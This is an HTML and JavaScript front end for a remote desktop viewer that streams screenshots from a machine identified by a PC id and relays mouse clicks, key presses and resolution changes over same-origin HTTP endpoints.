<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Remote Desktop - CFC</title>
    <link rel="stylesheet" type="text/css" href="../css/styles.css" />
    <style>
        body {
            margin: 0;
            padding: 0;
            background-color: #0f1219;
            color: #ffffff;
            font-family: Arial, sans-serif;
            height: 100vh;
            overflow: hidden;
        }
        
        .remote-desktop-container {
            display: flex;
            flex-direction: column;
            height: 100vh;
            padding: 20px;
            box-sizing: border-box;
        }
        
        .header {
            display: flex;
            justify-content: space-between;
            align-items: center;
            margin-bottom: 20px;
            padding-bottom: 10px;
            border-bottom: 1px solid #374151;
        }
        
        .controls {
            display: flex;
            gap: 15px;
            align-items: center;
        }
        
        .resolution-selector {
            display: flex;
            align-items: center;
            gap: 10px;
        }
        
        select {
            background-color: #1f2937;
            color: white;
            border: 1px solid #374151;
            padding: 5px 10px;
            border-radius: 4px;
        }
        
        button {
            background-color: #3b82f6;
            color: white;
            border: none;
            padding: 8px 16px;
            border-radius: 4px;
            cursor: pointer;
        }
        
        button:hover {
            background-color: #2563eb;
        }
        
        button:disabled {
            background-color: #4b5563;
            cursor: not-allowed;
        }
        
        .screenshot-container {
            flex: 1;
            display: flex;
            justify-content: center;
            align-items: center;
            background-color: #1f2937;
            border: 1px solid #374151;
            border-radius: 8px;
            overflow: hidden;
            position: relative;
        }
        
        #screenshot-image {
            width: 100%;
            height: 100%;
            object-fit: fill;
            display: none;
        }
        
        .loading {
            text-align: center;
            color: #9ca3af;
            position: absolute;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            z-index: 1;
        }
        
        .status {
            margin-top: 10px;
            text-align: center;
            color: #9ca3af;
            font-size: 14px;
        }
    </style>
</head>
<body>
    <div class="remote-desktop-container">
        <div class="header">
            <h1>Remote Desktop - <span id="pc-id-display"></span></h1>
            <div class="controls">
                <div class="resolution-selector">
                    <label for="resolution">Resolution:</label>
                    <select id="resolution">
                        <option value="slowest">Slower (Highest Quality)</option>
                        <option value="slow">Slow (High Quality)</option>
                        <option value="normal" selected>Normal (Medium Quality)</option>
                        <option value="fast">Fast (Low Quality)</option>
                        <option value="fastest">Faster (Lowest Quality)</option>
                    </select>
                </div>
                <button id="start-btn">Start Streaming</button>
                <button id="stop-btn" disabled>Stop Streaming</button>
            </div>
        </div>
        
        <div class="screenshot-container">
            <div id="loading" class="loading">
                <p>Click "Start Streaming" to begin remote desktop session</p>
            </div>
            <img id="screenshot-image" alt="Remote Desktop">
        </div>
        
        <div class="status" id="status">Ready</div>
    </div>

    <script>
        // Global variables
        let startBtn, stopBtn, resolutionSelect, screenshotImage, loadingDiv, statusDiv;
        let isStreaming = false;
        let streamingInterval = null;
        let pressedKeys = new Set();
        let pcId = null;
        
        // Global HTTP helpers (shared with handlers)
        window.httpAdd = async function(pcId, key, payload) {
            try {
                const url = `/add?pc_id=${encodeURIComponent(pcId)}&key=${encodeURIComponent(key)}`;
                const bodyPayload = (payload === undefined || payload === null) ? {} : payload;
                await fetch(url, {
                    method: 'POST',
                    headers: { 'Content-Type': 'application/json' },
                    body: JSON.stringify({ data: bodyPayload, 'data`': bodyPayload })
                });
            } catch (e) {
                console.error('httpAdd error', e);
            }
        };
        
        window.httpReceive = async function(pcId, key) {
            try {
                const url = `/receive?pc_id=${encodeURIComponent(pcId)}&key=${encodeURIComponent(key)}`;
                const res = await fetch(url, { cache: 'no-store' });
                if (!res.ok) return null;
                const json = await res.json();
                return json;
            } catch (e) {
                return null;
            }
        };
        
        // Wait for DOM to be ready before initializing
        document.addEventListener('DOMContentLoaded', function() {
            // Get DOM elements
            startBtn = document.getElementById('start-btn');
            stopBtn = document.getElementById('stop-btn');
            resolutionSelect = document.getElementById('resolution');
            screenshotImage = document.getElementById('screenshot-image');
            loadingDiv = document.getElementById('loading');
            statusDiv = document.getElementById('status');
            
            // Initialize HTTP-based streaming
            initializeHttpStreaming();
        });

        function initializeHttpStreaming() {
            try {
                // Get PC ID from URL (assign to global for handlers outside try block)
                pcId = window.location.pathname.split('/').pop();
                document.getElementById('pc-id-display').textContent = pcId;
                
                // Update status message
                function updateStatus(message) {
                    statusDiv.textContent = message;
                }
                
                // Get interval based on resolution setting
                function getInterval() {
                    return 100;

                }
                
                let keepAliveTimer = null;
                let receiveTimer = null;

                // Start streaming
                function startStreaming() {
                    if (isStreaming) return;
                    
                    isStreaming = true;
                    startBtn.disabled = true;
                    stopBtn.disabled = false;
                    updateStatus('Streaming started...');
                    
                    // Reset display
                    loadingDiv.innerHTML = '<p>Requesting screenshot...</p>';
                    loadingDiv.style.display = 'block';
                    screenshotImage.style.display = 'none';
                    
                    // Send initial START once via HTTP
                    httpAdd(pcId, 'remote_desktop', { type: 'remote_desktop', message: { command: 'START', resolution: resolutionSelect.value } });

                    // Keepalive to keep client streaming
                    keepAliveTimer = setInterval(function() {
                        if (!isStreaming) return;
                        httpAdd(pcId, 'remote_desktop', { type: 'remote_desktop', message: { command: 'KEEPALIVE' } });
                    }, 100);

                    // Continuous polling for screenshots (never auto-stop; user controls stop)
                    const interval = getInterval();
                    receiveTimer = setInterval(async function() {
                        if (!isStreaming) return;
                        const response = await httpReceive(pcId, 'remote_desktop_screenshot');
                        if (response && response.status === 'success' && response.data) {
                            // Display the screenshot
                            screenshotImage.src = 'data:image/png;base64,' + response.data;
                            screenshotImage.style.display = 'block';
                            loadingDiv.style.display = 'none';
                            updateStatus('Streaming active');
                        }
                    }, interval);
                }
                
                // Stop streaming
                function stopStreaming() {
                    if (!isStreaming) return;
                    
                    isStreaming = false;
                    if (keepAliveTimer) { clearInterval(keepAliveTimer); keepAliveTimer = null; }
                    if (receiveTimer) { clearInterval(receiveTimer); receiveTimer = null; }
                    startBtn.disabled = false;
                    stopBtn.disabled = true;
                    resolutionSelect.disabled = false;
                    updateStatus('Streaming stopped');
                    
                    // Send STOP command to client via HTTP
                    httpAdd(pcId, 'remote_desktop', { type: 'remote_desktop', message: { command: 'STOP' } });
                    
                    // Reset display
                    screenshotImage.style.display = 'none';
                    loadingDiv.style.display = 'block';
                    loadingDiv.innerHTML = '<p>Streaming stopped</p>';
                }
                
            } catch (error) {
                console.error('Error initializing HTTP streaming:', error);
                statusDiv.textContent = 'Failed to initialize HTTP streaming';
            }
            
            // Button event listeners
            startBtn.addEventListener('click', startStreaming);
            stopBtn.addEventListener('click', stopStreaming);
            
            // Mouse click event listener for remote desktop
            screenshotImage.addEventListener('click', function(event) {
                if (!isStreaming) return;
                
                const rect = screenshotImage.getBoundingClientRect();
                const x = event.clientX - rect.left;
                const y = event.clientY - rect.top;
                
                // Calculate relative coordinates (0-1 range)
                const relativeX = x / rect.width;
                const relativeY = y / rect.height;
                
                // Send click coordinates to server via HTTP
                httpAdd(pcId, 'remote_desktop', { type: 'remote_desktop', message: { pc_id: pcId, x: relativeX, y: relativeY, button: 'left', command: 'CLICK' } });
            });
            
            // Right click event listener for remote desktop
            screenshotImage.addEventListener('contextmenu', function(event) {
                if (!isStreaming) return;
                
                event.preventDefault(); // Prevent browser context menu
                
                const rect = screenshotImage.getBoundingClientRect();
                const x = event.clientX - rect.left;
                const y = event.clientY - rect.top;
                
                // Calculate relative coordinates (0-1 range)
                const relativeX = x / rect.width;
                const relativeY = y / rect.height;
                
                // Send right click coordinates to server via HTTP
                httpAdd(pcId, 'remote_desktop', { type: 'remote_desktop', message: { pc_id: pcId, x: relativeX, y: relativeY, button: 'right', command: 'CLICK' } });
            });
            
            document.addEventListener('keydown', function(event) {
                if (!isStreaming) return;
                
                if (['F1', 'F2', 'F3', 'F4', 'F5', 'F6', 'F7', 'F8', 'F9', 'F10', 'F11', 'F12'].includes(event.key)) {
                    event.preventDefault();
                }
                
                // Track pressed keys
                pressedKeys.add(event.key);
                
                // Get modifier keys
                const modifiers = [];
                if (event.ctrlKey) modifiers.push('ctrl');
                if (event.altKey) modifiers.push('alt');
                if (event.shiftKey) modifiers.push('shift');
                if (event.metaKey) modifiers.push('meta');
                
                // Send key press to server via HTTP
                httpAdd(pcId, 'remote_desktop', { type: 'remote_desktop', message: { pc_id: pcId, key: event.key, code: event.code, modifiers: modifiers, type: 'KEYDOWN', command: 'KEYBOARD' } });
            });
            
            document.addEventListener('keyup', function(event) {
                if (!isStreaming) return;
                
                // Remove from pressed keys
                pressedKeys.delete(event.key);
                
                // Get modifier keys
                const modifiers = [];
                if (event.ctrlKey) modifiers.push('ctrl');
                if (event.altKey) modifiers.push('alt');
                if (event.shiftKey) modifiers.push('shift');
                if (event.metaKey) modifiers.push('meta');
                
                // Send key release to server via HTTP
                httpAdd(pcId, 'remote_desktop', { type: 'remote_desktop', message: { pc_id: pcId, key: event.key, code: event.code, modifiers: modifiers, type: 'KEYUP', command: 'KEYBOARD' } });
            });
            
            // Resolution change handler
            resolutionSelect.addEventListener('change', function() {
                if (isStreaming) {
                    // Send resolution update immediately via HTTP and restart polling interval
                    const resolution = resolutionSelect.value;
                    httpAdd(pcId, 'remote_desktop', { type: 'remote_desktop', message: { command: 'RESOLUTION_UPDATE', resolution: resolution } });
                    if (receiveTimer) { clearInterval(receiveTimer); receiveTimer = null; }
                    const interval = (function(){
                        switch(resolution) {
                            case 'slowest': return 2000;
                            case 'slow': return 1000;
                            case 'normal': return 500;
                            case 'fast': return 250;
                            case 'fastest': return 100;
                            default: return 500;
                        }
                    })();
                    receiveTimer = setInterval(async function() {
                        if (!isStreaming) return;
                        const response = await httpReceive(pcId, 'remote_desktop_screenshot');
                        if (response && response.status === 'success' && response.data) {
                            screenshotImage.src = 'data:image/png;base64,' + response.data;
                            screenshotImage.style.display = 'block';
                            loadingDiv.style.display = 'none';
                            statusDiv.textContent = 'Streaming active';
                        }
                    }, interval);
                }
            });
        }
    </script>
</body>
</html>